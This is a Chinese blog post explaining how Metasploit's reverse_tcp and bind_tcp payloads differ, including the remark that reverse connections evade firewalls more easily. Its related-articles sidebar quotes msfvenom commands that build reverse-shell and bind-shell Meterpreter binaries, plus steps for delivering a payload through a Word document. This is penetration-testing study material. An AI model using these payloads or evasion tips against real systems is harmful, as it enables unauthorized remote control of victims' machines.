metasploit中Payload的reverse_tcp和bind_tcp的区别

最新推荐文章于 2024-05-14 04:18:38 发布
最新推荐文章于 2024-05-14 04:18:38 发布
阅读量1.5w 收藏 10
点赞数 9
分类专栏: Metasploit 文章标签: Metasploit bind_tcp reverse_tcp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/adidala/article/details/24117711
版权

reverse_tcpbind_tcp这两者的执行过程可以大致理解为以下内容:

[reverse_tcp]
attacker -> [contact me at the port 4444] -> victim

after the payload is executed
attacker <-> [port 4444] <-> victim

[bind_tcp]
attacker -> [open the way for me in the port 4444] -> victim

after execution
attacker <-> [port 4444] <-> victim

reverse_tcp:攻击机设置一个端口(LPORT)和IP(LHOST),Payload在测试机执行连接攻击机IP的端口,这时如果在攻击机监听该端口会发现测试机已经连接。

bind_tcp:攻击机设置一个端口(LPORT),Payload在测试机执行打开该端口,以便攻击机可以接入。


采用reverse的方法一般较为安全,因为是在测试机连接攻击机,所以一般不会被防火墙发现;而bind在测试机打开端口时很容易被安全软件和防火墙发现。


官方文档对bind_tcp和reverse_tcp的说明:



Reverse TCP
The reverse TCP handler is provided by the Msf::Handler::ReverseTcp class. It will listen on a port for incoming connections and will make a call into handle connection with the client sockets as they do.


Bind TCP
The bind TCP handler is provided through Msf::Handler::BindTcp. It will attempt to establish a connection to a target machine on a given port (specified in LPORT). If a connection is established, a call is made into handle connection passing along the socket associated with the connection.


未完待补充……


阿迪达拉参上
关注
  • 9
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Reverse_TCP_Program:用python编写的反向TCP程序
03-22
反向TCP程序 用python编写的反向TCP程序
deeplink-reverse-tcp:使用简单的Metasploit reverse_tcp有效负载,Microsoft Word和SettingContent-ms文件获得反向连接
05-24
反向链接 需要的东西:Microsoft word(最好是较旧的版本),notepad / notepad ++,Kali vm,Windows reverse_tcp负载和Windows机器 创建有效负载+命令和控制服务器设置 在Kali Linux创建Windows / Meterpreter / reverse_tcp有效负载 启动Apache服务器 将payload.exe推送到var / www / html 在Windows修改SettingContent-ms文件 打开记事本/记事本++,然后复制粘贴ILoveWindows.SettingContent-ms 用您的kali本地ip和有效负载可执行文件名称替换“ ” 保存 在Microsoft Word插入SettingContent-ms文件 打开Microsoft Word,然后转到“插入”->“对象”->
connect和bind
GetnextWindow的专栏
04-23 2104
考虑以下情形:我们使用UDP写一个echo程序,kehu
简单分析一下socketbind
weixin_33872660的博客
07-03 1055
  在最开始接触bind的时候,只是在写基于tcp的server端的时候,知道在listen之前需要先bind一下,用来确保socket能在某个固定的端口监听。而bind的时候,函数参数的端口填自己将要绑定的端口就行;而IP地址,需要填本机的IP,但是也可以用一个宏INADDR_ANY代替,用这个宏就可以不用查找本机的IP,它就可以代替本机的IP。当时只觉得这个INADDR_ANY比较神奇,但是...
利用msf工具制作反向木马渗透
最新发布
2401_84969611的博客
05-14 442
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
msf的reverse_tcpbind_tcp两者的区别
HoAd'blog
07-31 5565
msf的reverse_tcpbind_tcp两者的区别reverse_tcpbind_tcpreverse_httpreverse_https安全性 reverse_tcp 攻击机设置一个端口(LPORT)和IP(LHOST),Payload在测试机执行连接攻击机IP的端口,这时如果在攻击机监听该端口会发现测试机已经连接。 msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=0.0.0.0 lport=4444 -f elf -o shell bi
Metasploitmeterpreter/reverse_tcp+exploit/multi/handler攻击实战教程
Amdy_amdy的博客
08-23 2829
Metasploitmeterpreter/reverse_tcp+exploit/multi/handler攻击实战教程 由于是实战,肯定要一个服务器对吗?为了不搞破坏,我这里就不用服务器了。我现在已经用另一台电脑搭建了一个网站(用phpstudy快速搭建的),这台电脑IP是:192.168.1.103; 我用的是渗透测试系统Kali Linux,由于此系统是自带Metasploit,我的Kali Linux系统IP是:192.168.40.132,并且能够通过火狐浏览器正常访问到192.168.1
metasploitreverse_tcp payload的原理是什么
weixin_42578963的博客
02-18 226
反向TCP有效负载是一种网络有效负载,它允许攻击者从远程服务器向本地主机发送一个恶意的有效负载,以获取访问权限。它利用应用程序层协议(如HTTP)来传输恶意代码,从而让攻击者在远程服务器上直接访问本地主机,而不需要打开任何防火墙端口,并且可以将有效负载隐藏在HTTP流量。 ...
metasploit文使用指南
08-18
常见的payload类型有shellcode、reverse_tcpbind_tcp等,选择应根据目标环境和需求来确定。 六、防御策略与合规性 虽然Metasploit主要用于合法的安全测试,但滥用可能会触犯法律。进行渗透测试时,必须获得目标方...
Metasploit渗透测试指南(全) .pdf
12-23
本书会讲解各种payload类型,如shellcode、bind shell、reverse shell等,以及如何根据目标环境选择合适的payload。同时,还会涉及编码器的使用,以避开防火墙和反病毒软件的检测。 此外,书的高级话题可能涵盖...
metasploit
03-16
常见的payload类型有shellcode(shell代码)、reverse shells(反向shell)和bind shells(绑定shell)。 4. **Shell** 标签的"Shell"在这里指的是在成功利用漏洞后,攻击者可以获取到的目标系统的命令行界面。...
reverse-tunnel:反向隧道TCP和UDP
05-06
反向隧道TCP和UDP rtun是用于通过公共网关服务器将TCP和UDP端口公开给Internet的工具。 您可以在防火墙和NAT之后的计算机上公开ssh和mosh服务器。 建造 提供了已编译的二进制文件。 要构建自己的存储库,请克隆存储库并进行以下操作: $ git clone https://github.com/snsinfu/reverse-tunnel $ cd reverse-tunnel $ make 或者, $ go build -o rtun github.com/snsinfu/reverse-tunnel/agent/cmd $ go build -o rtun-server github.com/snsinfu/reverse-tunnel/server/cmd 码头工人 Docker映像可用: 快速使用: $ docker run -it \ -
Metasploit可执行后门.doc
06-25
Metasploit是一款广泛使用的渗透测试框架,它允许安全研究人员和渗透测试人员模拟黑客攻击行为,以评估系统和网络的安全性。在文档"Metasploit可执行后门.doc",我们看到的是如何利用Metasploit创建持久性的后门并...
java reverse 怎么实现_JAVA 后门 shell_reverse_tcp 实现
weixin_32021519的博客
02-24 449
遇到情景是可以在android上安装任意apk,执行apk后有个反弹shell的效果。一般来说直接用msf就可以生成android后门,但不知为何在目标设备上无法正常使用,故决定自己编写一个简单的apk以完成反弹shell。最终实现三个纯JAVA版的shell_reverse_tcp,当然塞进apk也好使。开始自己完成了一个无法完全交互的shell,类似一句话木马那种伪tty。因为思路也是web的...
msf reserve_tcp payload加载器的原理与实现
热门推荐
Shanfenglan's blog
08-19 27万+
#undef UNICODE #define WIN32_LEAN_AND_MEAN #include <windows.h> #include <winsock2.h> #include <ws2tcpip.h> #include <stdlib.h> #include <stdio.h> // Need to link with Ws2_32.lib #pragma comment (lib, "Ws2_32.lib") // #prag
ReverseTcpshell使用教程
m0_53087192的博客
03-11 464
测试环境 攻击机:192.168.50.100 windows10 被攻击:192.168.50.101 windows server 2016 生成payload 使用powershellReverseTCP.ps1运行 设置监听ip,端口 生成两种payload,一种powershell,一种cmd。 复制一个payload,在被攻击机上运行,返回shell。 火绒全程无反应。 ...
msf linux/x64/meterpreter/bind_tcp记录实践
want的博客
10-07 1757
1.设置监听,从tcp的角度来,要服务端先启动,客户端才能连接. 生成payload,赋权并执行 root@kali:~# msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=223 -f elf>x [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x
metasploit之基础命令操作
Longwaer
01-29 2922
学习了解MSF的各种命令小技巧,熟练掌握后渗透技术。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值